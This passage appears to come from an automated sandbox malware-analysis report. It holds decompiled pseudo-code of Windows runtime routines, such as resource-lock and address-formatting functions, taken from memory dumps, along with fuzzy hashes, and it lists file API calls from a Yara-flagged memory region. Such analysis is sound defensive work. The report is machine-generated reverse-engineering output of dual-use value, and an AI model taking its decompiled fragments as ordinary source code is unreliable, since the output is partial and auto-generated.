                                                              							_t179 = _t179 + 1;
                                                              							_t141 =  *_t179;
                                                              							if(_t141 == 0) {
                                                              								goto L41;
                                                              							}
                                                              							continue;
                                                              						}
                                                              						L7:
                                                              						if(_t141 == 0x3a) {
                                                              							if(_v24 > 0 || _v8 > 0) {
                                                              								goto L41;
                                                              							} else {
                                                              								_t130 = _t179 + 1;
                                                              								if( *_t130 != _t141) {
                                                              									goto L41;
                                                              								}
                                                              								_v20 = _v20 + 1;
                                                              								_t156 = 2;
                                                              								_v32 = 1;
                                                              								_v8 = _t156;
                                                              								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                              								goto L34;
                                                              							}
                                                              						}
                                                              						L8:
                                                              						if(_v8 > 7) {
                                                              							goto L41;
                                                              						}
                                                              						_t142 = _t141;
                                                              						if(E00A806BA(_t123, _t141) == 0 || _t124 == 0) {
                                                              							if(E00A806BA(_t124, _t142) == 0 || E00A80A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                              								goto L41;
                                                              							} else {
                                                              								_t128 = 1;
                                                              								_a7 = 1;
                                                              								_v28 = _t179;
                                                              								_v16 = 1;
                                                              								_v12 = 1;
                                                              								L39:
                                                              								if(_v16 == _t128) {
                                                              									goto L20;
                                                              								}
                                                              								goto L28;
                                                              							}
                                                              						} else {
                                                              							_a7 = 0;
                                                              							_v28 = _t179;
                                                              							_v16 = 1;
                                                              							_v12 = 1;
                                                              							goto L20;
                                                              						}
                                                              					}
                                                              				}
                                                              				L1:
                                                              				_t123 = _t108 == 1;
                                                              				if(_t108 == 1) {
                                                              					goto L8;
                                                              				}
                                                              				_t128 = 1;
                                                              				goto L39;
                                                              			}


























                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: __fassign
                                                              • String ID: .$:$:
                                                              • API String ID: 3965848254-2308638275
                                                              • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                              • Instruction ID: da0f3e67c07245a554817993a2fb5555378db85534ef3135e967e148c5833d03
                                                              • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                              • Instruction Fuzzy Hash: 7DA1B1B1D0030ADFDFA8EF64C845EBEB7B4BF05305F24856AD852A7281D7349A49CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 50%
                                                              			E00A80554(signed int _a4, char _a8) {
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int* _t49;
                                                              				signed int _t51;
                                                              				signed int _t56;
                                                              				signed int _t58;
                                                              				signed int _t61;
                                                              				signed int _t63;
                                                              				void* _t66;
                                                              				intOrPtr _t67;
                                                              				void* _t69;
                                                              				signed int _t70;
                                                              				void* _t75;
                                                              				signed int _t81;
                                                              				signed int _t84;
                                                              				void* _t86;
                                                              				signed int _t93;
                                                              				signed int _t96;
                                                              				intOrPtr _t105;
                                                              				signed int _t107;
                                                              				void* _t110;
                                                              				signed int _t115;
                                                              				signed int* _t119;
                                                              				void* _t125;
                                                              				void* _t126;
                                                              				signed int _t128;
                                                              				signed int _t130;
                                                              				signed int _t138;
                                                              				signed int _t144;
                                                              				void* _t158;
                                                              				void* _t159;
                                                              				void* _t160;
                                                              
                                                              				_t96 = _a4;
                                                              				_t115 =  *(_t96 + 0x28);
                                                              				_push(_t138);
                                                              				if(_t115 < 0) {
                                                              					_t105 =  *[fs:0x18];
                                                              					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                              					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                              						goto L6;
                                                              					} else {
                                                              						__eflags = _t115 | 0xffffffff;
                                                              						asm("lock xadd [eax], edx");
                                                              						return 1;
                                                              					}
                                                              				} else {
                                                              					L6:
                                                              					_push(_t128);
                                                              					while(1) {
                                                              						L7:
                                                              						__eflags = _t115;
                                                              						if(_t115 >= 0) {
                                                              							break;
                                                              						}
                                                              						__eflags = _a8;
                                                              						if(_a8 == 0) {
                                                              							__eflags = 0;
                                                              							return 0;
                                                              						} else {
                                                              							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                              							_t49 = _t96 + 0x1c;
                                                              							_t106 = 1;
                                                              							asm("lock xadd [edx], ecx");
                                                              							_t115 =  *(_t96 + 0x28);
                                                              							__eflags = _t115;
                                                              							if(_t115 < 0) {
                                                              								L23:
                                                              								_t130 = 0;
                                                              								__eflags = 0;
                                                              								while(1) {
                                                              									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                              									asm("sbb esi, esi");
                                                              									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00b201c0;
                                                              									_push(_t144);
                                                              									_push(0);
                                                              									_t51 = E00A3F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                              									__eflags = _t51 - 0x102;
                                                              									if(_t51 != 0x102) {
                                                              										break;
                                                              									}
                                                              									_t106 =  *(_t144 + 4);
                                                              									_t126 =  *_t144;
                                                              									_t86 = E00A84FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                              									_push(_t126);
                                                              									_push(_t86);
                                                              									E00A93F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                              									E00A93F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                              									_t130 = _t130 + 1;
                                                              									_t160 = _t158 + 0x28;
                                                              									__eflags = _t130 - 2;
                                                              									if(__eflags > 0) {
                                                              										E00AC217A(_t106, __eflags, _t96);
                                                              									}
                                                              									_push("RTL: Re-Waiting\n");
                                                              									_push(0);
                                                              									_push(0x65);
                                                              									E00A93F92();
                                                              									_t158 = _t160 + 0xc;
                                                              								}
                                                              								__eflags = _t51;
                                                              								if(__eflags < 0) {
                                                              									_push(_t51);
                                                              									E00A83915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                              									asm("int3");
                                                              									while(1) {
                                                              										L32:
                                                              										__eflags = _a8;
                                                              										if(_a8 == 0) {
                                                              											break;
                                                              										}
                                                              										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                              										_t119 = _t96 + 0x24;
                                                              										_t107 = 1;
                                                              										asm("lock xadd [eax], ecx");
                                                              										_t56 =  *(_t96 + 0x28);
                                                              										_a4 = _t56;
                                                              										__eflags = _t56;
                                                              										if(_t56 != 0) {
                                                              											L40:
                                                              											_t128 = 0;
                                                              											__eflags = 0;
                                                              											while(1) {
                                                              												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                              												asm("sbb esi, esi");
                                                              												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00b201c0;
                                                              												_push(_t138);
                                                              												_push(0);
                                                              												_t58 = E00A3F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                              												__eflags = _t58 - 0x102;
                                                              												if(_t58 != 0x102) {
                                                              													break;
                                                              												}
                                                              												_t107 =  *(_t138 + 4);
                                                              												_t125 =  *_t138;
                                                              												_t75 = E00A84FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                              												_push(_t125);
                                                              												_push(_t75);
                                                              												E00A93F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                              												E00A93F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                              												_t128 = _t128 + 1;
                                                              												_t159 = _t158 + 0x28;
                                                              												__eflags = _t128 - 2;
                                                              												if(__eflags > 0) {
                                                              													E00AC217A(_t107, __eflags, _t96);
                                                              												}
                                                              												_push("RTL: Re-Waiting\n");
                                                              												_push(0);
                                                              												_push(0x65);
                                                              												E00A93F92();
                                                              												_t158 = _t159 + 0xc;
                                                              											}
                                                              											__eflags = _t58;
                                                              											if(__eflags < 0) {
                                                              												_push(_t58);
                                                              												E00A83915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                              												asm("int3");
                                                              												_t61 =  *_t107;
                                                              												 *_t107 = 0;
                                                              												__eflags = _t61;
                                                              												if(_t61 == 0) {
                                                              													L1:
                                                              													_t63 = E00A65384(_t138 + 0x24);
                                                              													if(_t63 != 0) {
                                                              														goto L52;
                                                              													} else {
                                                              														goto L2;
                                                              													}
                                                              												} else {
                                                              													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                              													_push( &_a4);
                                                              													_push(_t61);
                                                              													_t70 = E00A3F970( *((intOrPtr*)(_t138 + 0x18)));
                                                              													__eflags = _t70;
                                                              													if(__eflags >= 0) {
                                                              														goto L1;
                                                              													} else {
                                                              														_push(_t70);
                                                              														E00A83915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                              														L52:
                                                              														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                              														_push( &_a4);
                                                              														_push(1);
                                                              														_t63 = E00A3F970( *((intOrPtr*)(_t138 + 0x20)));
                                                              														__eflags = _t63;
                                                              														if(__eflags >= 0) {
                                                              															L2:
                                                              															return _t63;
                                                              														} else {
                                                              															_push(_t63);
                                                              															E00A83915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                              															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                              															_push( &_a4);
                                                              															_push(1);
                                                              															_t63 = E00A3F970( *((intOrPtr*)(_t138 + 0x20)));
                                                              															__eflags = _t63;
                                                              															if(__eflags >= 0) {
                                                              																goto L2;
                                                              															} else {
                                                              																_push(_t63);
                                                              																_t66 = E00A83915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                              																asm("int3");
                                                              																while(1) {
                                                              																	_t110 = _t66;
                                                              																	__eflags = _t66 - 1;
                                                              																	if(_t66 != 1) {
                                                              																		break;
                                                              																	}
                                                              																	_t128 = _t128 | 0xffffffff;
                                                              																	_t66 = _t110;
                                                              																	asm("lock cmpxchg [ebx], edi");
                                                              																	__eflags = _t66 - _t110;
                                                              																	if(_t66 != _t110) {
                                                              																		continue;
                                                              																	} else {
                                                              																		_t67 =  *[fs:0x18];
                                                              																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                              																		return _t67;
                                                              																	}
                                                              																	goto L59;
                                                              																}
                                                              																E00A65329(_t110, _t138);
                                                              																_t69 = E00A653A5(_t138, 1);
                                                              																return _t69;
                                                              															}
                                                              														}
                                                              													}
                                                              												}
                                                              											} else {
                                                              												_t56 =  *(_t96 + 0x28);
                                                              												goto L3;
                                                              											}
                                                              										} else {
                                                              											_t107 =  *_t119;
                                                              											__eflags = _t107;
                                                              											if(__eflags > 0) {
                                                              												while(1) {
                                                              													_t81 = _t107;
                                                              													asm("lock cmpxchg [edi], esi");
                                                              													__eflags = _t81 - _t107;
                                                              													if(_t81 == _t107) {
                                                              														break;
                                                              													}
                                                              													_t107 = _t81;
                                                              													__eflags = _t81;
                                                              													if(_t81 > 0) {
                                                              														continue;
                                                              													}
                                                              													break;
                                                              												}
                                                              												_t56 = _a4;
                                                              												__eflags = _t107;
                                                              											}
                                                              											if(__eflags != 0) {
                                                              												while(1) {
                                                              													L3:
                                                              													__eflags = _t56;
                                                              													if(_t56 != 0) {
                                                              														goto L32;
                                                              													}
                                                              													_t107 = _t107 | 0xffffffff;
                                                              													_t56 = 0;
                                                              													asm("lock cmpxchg [edx], ecx");
                                                              													__eflags = 0;
                                                              													if(0 != 0) {
                                                              														continue;
                                                              													} else {
                                                              														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                              														return 1;
                                                              													}
                                                              													goto L59;
                                                              												}
                                                              												continue;
                                                              											} else {
                                                              												goto L40;
                                                              											}
                                                              										}
                                                              										goto L59;
                                                              									}
                                                              									__eflags = 0;
                                                              									return 0;
                                                              								} else {
                                                              									_t115 =  *(_t96 + 0x28);
                                                              									continue;
                                                              								}
                                                              							} else {
                                                              								_t106 =  *_t49;
                                                              								__eflags = _t106;
                                                              								if(__eflags > 0) {
                                                              									while(1) {
                                                              										_t93 = _t106;
                                                              										asm("lock cmpxchg [edi], esi");
                                                              										__eflags = _t93 - _t106;
                                                              										if(_t93 == _t106) {
                                                              											break;
                                                              										}
                                                              										_t106 = _t93;
                                                              										__eflags = _t93;
                                                              										if(_t93 > 0) {
                                                              											continue;
                                                              										}
                                                              										break;
                                                              									}
                                                              									__eflags = _t106;
                                                              								}
                                                              								if(__eflags != 0) {
                                                              									continue;
                                                              								} else {
                                                              									goto L23;
                                                              								}
                                                              							}
                                                              						}
                                                              						goto L59;
                                                              					}
                                                              					_t84 = _t115;
                                                              					asm("lock cmpxchg [esi], ecx");
                                                              					__eflags = _t84 - _t115;
                                                              					if(_t84 != _t115) {
                                                              						_t115 = _t84;
                                                              						goto L7;
                                                              					} else {
                                                              						return 1;
                                                              					}
                                                              				}
                                                              				L59:
                                                              			}

                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AA2206
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-4236105082
                                                              • Opcode ID: 908223327254f09830818ec8ae3f7d4d877e2b0970df773f599098c952fda512
                                                              • Instruction ID: 7662a3023d0ac1f1c6d74e8822ec220e7cd4a0393b1a915961b4bed8a8587431
                                                              • Opcode Fuzzy Hash: 908223327254f09830818ec8ae3f7d4d877e2b0970df773f599098c952fda512
                                                              • Instruction Fuzzy Hash: 52513935B002116FEF199B18CC81FA673A9AFD9710F218229FD55DF2C6DA31EC5587A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 64%
                                                              			E00A814C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                              				signed int _v8;
                                                              				char _v10;
                                                              				char _v140;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t24;
                                                              				void* _t26;
                                                              				signed int _t29;
                                                              				signed int _t34;
                                                              				signed int _t40;
                                                              				intOrPtr _t45;
                                                              				void* _t51;
                                                              				intOrPtr* _t52;
                                                              				void* _t54;
                                                              				signed int _t57;
                                                              				void* _t58;
                                                              
                                                              				_t51 = __edx;
                                                              				_t24 =  *0xb22088; // 0x745f356a
                                                              				_v8 = _t24 ^ _t57;
                                                              				_t45 = _a16;
                                                              				_t53 = _a4;
                                                              				_t52 = _a20;
                                                              				if(_a4 == 0 || _t52 == 0) {
                                                              					L10:
                                                              					_t26 = 0xc000000d;
                                                              				} else {
                                                              					if(_t45 == 0) {
                                                              						if( *_t52 == _t45) {
                                                              							goto L3;
                                                              						} else {
                                                              							goto L10;
                                                              						}
                                                              					} else {
                                                              						L3:
                                                              						_t28 =  &_v140;
                                                              						if(_a12 != 0) {
                                                              							_push("[");
                                                              							_push(0x41);
                                                              							_push( &_v140);
                                                              							_t29 = E00A77707();
                                                              							_t58 = _t58 + 0xc;
                                                              							_t28 = _t57 + _t29 * 2 - 0x88;
                                                              						}
                                                              						_t54 = E00A813CB(_t53, _t28);
                                                              						if(_a8 != 0) {
                                                              							_t34 = E00A77707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                              							_t58 = _t58 + 0x10;
                                                              							_t54 = _t54 + _t34 * 2;
                                                              						}
                                                              						if(_a12 != 0) {
                                                              							_t40 = E00A77707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                              							_t58 = _t58 + 0x10;
                                                              							_t54 = _t54 + _t40 * 2;
                                                              						}
                                                              						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                              						 *_t52 = _t53;
                                                              						if( *_t52 < _t53) {
                                                              							goto L10;
                                                              						} else {
                                                              							E00A42340(_t45,  &_v140, _t53 + _t53);
                                                              							_t26 = 0;
                                                              						}
                                                              					}
                                                              				}
                                                              				return E00A4E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                              			}

                                                              APIs
                                                              • ___swprintf_l.LIBCMT ref: 00AAEA22
                                                                • Part of subcall function 00A813CB: ___swprintf_l.LIBCMT ref: 00A8146B
                                                                • Part of subcall function 00A813CB: ___swprintf_l.LIBCMT ref: 00A81490
                                                              • ___swprintf_l.LIBCMT ref: 00A8156D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u$j5_t
                                                              • API String ID: 48624451-104286428
                                                              • Opcode ID: 7d3d601b5c065af6819efa8aa9111b20fa3f77d37546ed2a927dd24314fe86d1
                                                              • Instruction ID: 8eebf5763d3f5fbfe0faef7f2a56e820e9104b416245083c7acf16ea107c958d
                                                              • Opcode Fuzzy Hash: 7d3d601b5c065af6819efa8aa9111b20fa3f77d37546ed2a927dd24314fe86d1
                                                              • Instruction Fuzzy Hash: E52191B2900219ABCB24EF58CD41AEF73BCBB90700F548555FC4AD7141DB70AA5A8BE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AA22F4
                                                              Strings
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00AA22FC
                                                              • RTL: Re-Waiting, xrefs: 00AA2328
                                                              • RTL: Resource at %p, xrefs: 00AA230B
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-871070163
                                                              • Opcode ID: 47360fa4984136556182ee5e1c49b921a4c9c39c788f914cf3dedb55397d740a
                                                              • Instruction ID: 1317fc116970ccd443843b3140a28835e8de914156106ca3ee5e25088ffbf05f
                                                              • Opcode Fuzzy Hash: 47360fa4984136556182ee5e1c49b921a4c9c39c788f914cf3dedb55397d740a
                                                              • Instruction Fuzzy Hash: F9513572A007026BDF15EB38CD91FA673A8EF59760F104229FD49DF281EB61EC4187A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00AA248D
                                                              • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00AA24BD
                                                              • RTL: Re-Waiting, xrefs: 00AA24FA
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                              • API String ID: 0-3177188983
                                                              • Opcode ID: 3027f4730e28788b4e5bdaff0af2008c4e52aa1852825e821c44ea06e2aa128d
                                                              • Instruction ID: a9617e94e8cd553535f009ceadff3816f547e7db78c8739b9d94108c324ab5e5
                                                              • Opcode Fuzzy Hash: 3027f4730e28788b4e5bdaff0af2008c4e52aa1852825e821c44ea06e2aa128d
                                                              • Instruction Fuzzy Hash: 4541F375A00304BFCB24EB68CD85FAA77B8EF89720F208615F5559B2C1D734E95187A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: __fassign
                                                              • String ID:
                                                              • API String ID: 3965848254-0
                                                              • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                              • Instruction ID: d320c53a9a8fa5328728e580ca10bc981a117142d8afb24f24fe5635d5ed1fc2
                                                              • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                              • Instruction Fuzzy Hash: CE915A31E0020AEFDF28DF98CC456AEB7B4EB55314F24C47AD419A72A2E7305B85CB95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00A7FED6: ___swprintf_l.LIBCMT ref: 00A7FEFD
                                                              • ___swprintf_l.LIBCMT ref: 00AAEA87
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u$j5_t
                                                              • API String ID: 48624451-2675202035
                                                              • Opcode ID: 97ee66e90f442687a557860d665f35263fc8ff6172944f6da33512c2f1cfc83f
                                                              • Instruction ID: 60f15ac92ae0c3f0aa7c4b78a6f7f3b97b7656781985d60f548671817ac4b4bf
                                                              • Opcode Fuzzy Hash: 97ee66e90f442687a557860d665f35263fc8ff6172944f6da33512c2f1cfc83f
                                                              • Instruction Fuzzy Hash: A0117F76500219AFCB10EFA8CD509BBB7B8AB54700B54892AF949D7152EB30AA14CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Executed Functions

                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,000D4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000D4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 000DA3AD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID: .z`
                                                              • API String ID: 823142352-1441809116
                                                              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                              • Instruction ID: 2cf0fd6d45c5413c73f76456fb2362dfc31e7dfabd6e80247b9f9572b117baf0
                                                              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                              • Instruction Fuzzy Hash: C1F0BDB2200208ABCB08CF88DC85EEB77ADEF8C754F158248BA0D97241C630E8118BA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1J,FFFFFFFF,?,rM,?,00000000), ref: 000DA455
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID: 1J
                                                              • API String ID: 2738559852-2932837767
                                                              • Opcode ID: 3b64409855d51beab7a2484172b630d8b035c7d66292ae0b4cfa7e96f7101326
                                                              • Instruction ID: a970249c29711b3f2c798050d51e2b80851bbefdbe87d5ab8db3f829dedc3c3b
                                                              • Opcode Fuzzy Hash: 3b64409855d51beab7a2484172b630d8b035c7d66292ae0b4cfa7e96f7101326
                                                              • Instruction Fuzzy Hash: BFF0F4B2200208ABCB14DF88DC80EEB77A9EF8C754F158658BE0DA7241C630ED11CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1J,FFFFFFFF,?,rM,?,00000000), ref: 000DA455
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID: 1J
                                                              • API String ID: 2738559852-2932837767
                                                              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                              • Instruction ID: b8dcda35654d662fdec0f780c5e06c6bc8c4e237612b22b272518d9ea63c0ac1
                                                              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                              • Instruction Fuzzy Hash: E4F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158259BE1D97241D630E811CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtClose.NTDLL(PM,?,?,000D4D50,00000000,FFFFFFFF), ref: 000DA4B5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID: PM
